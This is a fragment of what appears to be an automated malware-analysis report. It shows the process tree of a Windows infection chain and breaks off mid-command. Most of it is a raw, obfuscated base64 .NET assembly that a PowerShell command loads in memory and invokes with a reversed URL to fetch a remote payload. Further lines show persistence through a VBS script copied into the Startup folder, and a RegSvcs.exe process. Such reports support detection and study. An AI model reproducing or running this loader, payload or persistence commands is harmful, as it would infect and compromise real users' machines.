2?? Dr?? ?? Q?? ?? Q?? F?? ?? U?? Bg?? H?? ?? c?? C?? ?? K?? ?? k?? ?? ?? ?? ?? BpwB?? ?? D0BKEB?? ?? DsBaYB?? ?? BjBqsB?? ?? D?? Bb?? B?? ?? BM?? bUB?? ?? C4B7sB?? ?? BpB7sB?? ?? DI?? M?? B?? g?? E?? ?? M?? ?? g?? F?? ?? U?? ?? g?? G?? ?? c?? ?? g?? H?? ?? k?? ?? g?? I?? ?? s?? ?? g?? J?? ?? 0?? ?? Q?? K?? ?? 0?? ?? g?? N?? ?? 8?? ?? g?? O?? BE?? ?? g?? Y?? BM?? Lg?? 1?? Dw?? QwDd?? P?? ?? /w?? G?? QS?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FMF?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? U?? XI?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BQBlgQ?? ?? ?? ?? ?? Cg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? HQF7?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? CYH?? ?? ?? J?? ?? Q?? Cg?? E?? ?? ?? ?? E?? ?? U?? E?? ?? ?? ?? ?? Q?? Cs?? Q?? ?? ?? ?? ?? ?? ?? LQB?? ?? HM?? 5gBz?? ?? kB?? ?? ?? ?? Q29udGV4dFZhbHVlYDE?? VGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDE?? XzU?? Z2V0X1VURjg?? PE1vZHVsZT4?? V?? BEaXNwb3NlX19JbnN0YW5jZV9f?? ENyZWF0ZV9fSW5zdGFuY2VfXwBVRHNTaURiYgBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWM?? TG9hZ?? BTeW5jaHJvbml6ZWQ?? R2V0TWV0aG9k?? FJlcGxhY2U?? Q3JlYXRlSW5zdGFuY2U?? Z2V0X0dldEluc3RhbmNl?? GRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2U?? UnVudGltZVR5cGVIYW5kbGU?? R2V0VHlwZUZyb21IYW5kbGU?? R2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmU?? TWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2U?? QXBwbGljYXRpb25TZXR0aW5nc0Jhc2U?? U3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRl?? EhlbHBLZXl3b3JkQXR0cmlidXRl?? EdlbmVyYXRlZENvZGVBdHRyaWJ1dGU?? RGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRl?? EVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRl?? EFzc2VtYmx5VGl0bGVBdHRyaWJ1dGU?? U3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGU?? SGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGU?? QXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGU?? VGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRl?? ERlYnVnZ2VySGlkZGVuQXR0cmlidXRl?? EFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGU?? TXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGU?? QXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl?? EFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGU?? UnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGU?? Z2V0X1ZhbHVl?? HNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBVR2x5bXpVZwBzZXRfRW5jb2Rpbmc?? U3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5n?? ERvd25sb2FkU3RyaW5n?? FRvU3RyaW5n?? E1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFs?? FN5c3RlbS5Db21wb25lbnRNb2Rlb?? BscE9VcGxNcC5kbGw?? U3lzdGVt?? HJlc291cmNlTWFu?? FN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24?? QXBwRG9tYWlu?? GdldF9DdXJyZW50RG9tYWlu?? GdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9u?? FN5c3RlbS5Db25maWd1cmF0aW9u?? FN5c3RlbS5HbG9iYWxpemF0aW9u?? FN5c3RlbS5SZWZsZWN0aW9u?? E1ldGhvZEluZm8?? Q3VsdHVyZUluZm8?? bHBPVXBsTX?? ?? bV9BcHBPYmplY3RQcm92aWRlcgBtX1VzZXJPYmplY3RQcm92aWRlcgBtX0NvbXB1dGVyT2JqZWN0UHJvdmlkZXI?? bV9NeVdlYlNlcnZpY2VzT2JqZWN0UHJvdmlkZXI?? Z2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXI?? TXlDb21wdXRlcgBBY3RpdmF0b3I?? LmN0b3I?? LmNjdG9y?? FN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXM?? TXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM?? TWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXM?? U3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2Vz?? GxwT1VwbE1wLk15LlJlc291cmNlcwBscE9VcGxNcC5SZXNvdXJjZXMucmVzb3VyY2Vz?? ERlYnVnZ2luZ01vZGVz?? FN0cmluZ3M?? Z2V0X1NldHRpbmdz?? E15U2V0dGluZ3M?? UmVmZXJlbmNlRXF1YWxz?? FJ1bnRpbWVIZWxwZXJz?? ENvbmNhd?? BPYmplY3Q?? TXlQcm9qZWN0?? FN5c3RlbS5OZXQ?? Z2V0X0RlZmF1bHQ?? V2ViQ2xpZW50?? ENvbnZlcnQ?? U3lzdGVtLlRleHQ?? bV9Db250ZXh0?? GxwT1VwbE1wLk15?? GdldF9Bc3NlbWJseQBNeVNldHRpbmdzUHJvcGVydHk?? ?? CVs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBS?? GU?? cwBv?? HU?? cgBj?? GU?? cw?? ?? V3Q?? e?? B0?? C4?? N?? ?? v?? H?? ?? bQB1?? HI?? Lw?? x?? DU?? Mg?? u?? Dc?? Nw?? x?? C4?? M?? ?? 1?? C4?? O?? ?? 5?? DE?? Q?? Bu?? G8?? d?? Bj?? GU?? d?? Bl?? GQ?? bwBu?? C8?? Lw?? 6?? H?? ?? d?? B0?? Gg?? ?? ?? VIJhEm?? QNB?? ?? BFawBy?? G8?? dwBl?? G0?? YQBy?? EY?? X?? BU?? EU?? Tg?? u?? HQ?? ZgBv?? HM?? bwBy?? GM?? aQBN?? Fw?? cwB3?? G8?? Z?? Bu?? Gk?? VwBc?? Do?? Qw?? ?? Fzk?? MQ?? z?? D?? ?? Mw?? u?? D?? ?? Lg?? 0?? HY?? X?? ?? ?? I2o?? SQBD?? HU?? Z?? BI?? E8?? T?? ?? u?? Ec?? WgBu?? G4?? SwBv?? Fc?? Yw?? ?? EXo?? egBH?? HY?? d?? Bw?? GI?? bw?? ?? GVw?? UgBl?? Gc?? UwB2?? GM?? cw?? u?? GU?? e?? Bl?? ?? ?? ?? hFFgqWcwdE6wlnV8YWFE?? g?? EI?? EBC?? Mg?? ?? EFI?? EBEREEI?? EBDgQg?? QECBS?? C?? Q4OBS?? B?? RFBBy?? E?? Q4ODg4GFRIo?? RIMBhUSK?? ESC?? YVEigBEmEGFRIo?? RIkBC?? ?? Ew?? F?? ?? ICHBwH?? ?? ESaRG?? iQUg?? BK?? jQcg?? gEOEoCNC?? ?? BEoCREoCRBgcEDg4ODgU?? ?? BK?? mQYg?? QESgJkE?? ?? EODgQg?? Q4OBS?? CDg4OBQ?? CDg4OBQ?? ?? EoClBQ?? BHQUOBy?? BEoCNHQUFI?? ESaQ4GI?? ESgK0OBi?? CHBwdH?? Q?? ?? RwcBC?? B?? hwDI?? ?? I?? y?? ?? DgQH?? R4?? ?? h4?? BR?? B?? B4?? B?? oBHg?? EBwET?? ?? YVEigBEw?? HBhUSbQET?? ?? YVEm0BEw?? CEw?? ECgET?? ?? Ug?? QET?? ?? i3elxWGTTgiQiwP19/EdUKOgcGFRIo?? RIMBwYVEigBEggHBhUSK?? ESYQcGFRIo?? RIk?? wYSfQQGEoCB?? wYSG?? M?? ?? ?? EE?? ?? ?? SD?? Q?? ?? BIIB?? ?? ?? EmEE?? ?? ?? SJ?? Q?? ?? BJ9BQ?? ?? EoCBBg?? B?? RK?? gQQ?? ?? BIYB?? ?? B?? Q4EI?? ?? SaQcQ?? QEe?? B4?? Bz?? B?? QEQHg?? EC?? ?? SD?? QI?? BIIB?? g?? EmEEC?? ?? SJ?? QI?? BJ9BQg?? EoCBB?? g?? EhgEK?? ?? T?? ?? gB?? ?? g?? ?? ?? ?? ?? ?? B4B?? ?? E?? V?? IWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEI?? Q?? C?? ?? ?? ?? ?? ?? ?? N?? Q?? IbHBPVXBsTX?? ?? ?? BcB?? BJDb3B5cmlnaHQgwqkgIDIwMjI?? ?? ?? UB?? ?? ?? ?? ?? CkB?? CRhMTU5NDFlMy03ZDM4LTQwYmEtYmI5MC1mYTE5YTZjNjg1NmI?? ?? ?? wB?? ?? cxLj?? uMC4w?? ?? BN?? Q?? cLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMQE?? V?? 4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjEE?? Q?? ?? ?? ?? gB?? ?? E?? ?? ?? ?? ?? ?? BgB?? ?? pNeVRlbXBsYXRlCDExLj?? uMC4w?? ?? BB?? Q?? zU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE3Lj?? uMC4w?? ?? BZ?? QBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE3Lj?? uMy4w?? ?? Bh?? Q?? 0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXw?? ?? ?? B?? B?? ?? tNeS5Db21wdXRlcg?? ?? EwE?? Dk15LkFwcGxpY2F0aW9u?? ?? ?? M?? Q?? HTXkuVXNlcg?? ?? EwE?? Dk15LldlYlNlcnZpY2Vz?? ?? ?? Q?? Q?? LTXkuU2V0dGluZ3M?? ?? ?? C0?? ?? ?? ?? zsrvvgE?? ?? ?? CR?? ?? ?? ?? bFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLj?? sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZT?? 4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNld?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FBBRFBBRFC0?? ?? ?? ?? ?? ?? ?? ?? ?? H6xN+k?? ?? ?? ?? ?? ?? g?? ?? ?? Gk?? ?? ?? BEOQ?? ?? RBs?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BSU0RTz7YbjMR2n0y4xJgHLeBcd?? E?? ?? ?? BEOlxIYWNraW5nXENyeXB0ZXJzIE1vZGRpbmdcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXGxwT1VwbE1wLnBkYgDVOQ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DvOQ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4Tk?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BfQ29yRGxsTWFpbgBtc2NvcmVlLmRsb?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? /yU?? I?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? B?? ?? ?? ?? ?? Y?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? E?? ?? ?? ?? w?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? BI?? ?? ?? ?? WE?? ?? ?? DwD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DwDN?? ?? ?? ?? FY?? UwBf?? FY?? RQBS?? FM?? SQBP?? E4?? XwBJ?? E4?? RgBP?? ?? ?? ?? ?? ?? C9BO/+?? ?? ?? B?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? /?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? R?? ?? ?? ?? ?? E?? VgBh?? HI?? RgBp?? Gw?? ZQBJ?? G4?? ZgBv?? ?? ?? ?? ?? ?? ?? k?? ?? Q?? ?? ?? BU?? HI?? YQBu?? HM?? b?? Bh?? HQ?? aQBv?? G4?? ?? ?? ?? ?? ?? ?? ?? ?? s?? Sc?? g?? ?? ?? QBT?? HQ?? cgBp?? G4?? ZwBG?? Gk?? b?? Bl?? Ek?? bgBm?? G8?? ?? ?? B4?? g?? ?? ?? Q?? w?? D?? ?? M?? ?? w?? D?? ?? N?? Bi?? D?? ?? ?? ?? ?? q?? ?? k?? ?? QBD?? G8?? bQBt?? GU?? bgB0?? HM?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DI?? CQ?? B?? EM?? bwBt?? H?? ?? YQBu?? Hk?? TgBh?? G0?? ZQ?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? 6?? ?? k?? ?? QBG?? Gk?? b?? Bl?? EQ?? ZQBz?? GM?? cgBp?? H?? ?? d?? Bp?? G8?? bg?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? w?? ?? g?? ?? QBG?? Gk?? b?? Bl?? FY?? ZQBy?? HM?? aQBv?? G4?? ?? ?? ?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 6?? ?? 0?? ?? QBJ?? G4?? d?? Bl?? HI?? bgBh?? Gw?? TgBh?? G0?? ZQ?? ?? ?? Gw?? c?? BP?? FU?? c?? Bs?? E0?? c?? ?? u?? GQ?? b?? Bs?? ?? ?? ?? ?? ?? BI?? BI?? ?? QBM?? GU?? ZwBh?? Gw?? QwBv?? H?? ?? eQBy?? Gk?? ZwBo?? HQ?? ?? ?? BD?? G8?? c?? B5?? HI?? aQBn?? Gg?? d?? ?? g?? Kk?? I?? ?? g?? DI?? M?? ?? y?? DI?? ?? ?? ?? q?? ?? E?? ?? QBM?? GU?? ZwBh?? Gw?? V?? By?? GE?? Z?? Bl?? G0?? YQBy?? Gs?? cw?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EI?? DQ?? B?? E8?? cgBp?? Gc?? aQBu?? GE?? b?? BG?? Gk?? b?? Bl?? G4?? YQBt?? GU?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBk?? Gw?? b?? ?? ?? ?? ?? ?? ?? Mg?? J?? ?? E?? U?? By?? G8?? Z?? B1?? GM?? d?? BO?? GE?? bQBl?? ?? ?? ?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DQ?? C?? ?? B?? F?? ?? cgBv?? GQ?? dQBj?? HQ?? VgBl?? HI?? cwBp?? G8?? bg?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 4?? ?? g?? ?? QBB?? HM?? cwBl?? G0?? YgBs?? Hk?? I?? BW?? GU?? cgBz?? Gk?? bwBu?? ?? ?? ?? MQ?? u?? D?? ?? Lg?? w?? C4?? M?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? w?? ?? ?? M?? ?? ?? ?? BDo?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ';[Byte[]] $fuUN = [System.Convert]::FromBase64String( $LHgK.replace('?? ','A') );[System.AppDomain]::CurrentDomain.Load($fuUN).GetType('lpOUplMp.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.asacWENtarJN02%4602%esab/asac02%WENtarJN/moc.oueu.wenasactarjn//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)

RegSvcs.exe (PID: 3016 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

wscript.exe (PID: 1744 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 5992 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6540 cmdline: ping 127.0.0.1 -n 10 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

powershell.exe (PID: 5184 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') MD5: 95000560239032BC68B4C2FDFCDEF913)

powershell.exe (PID: 5872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 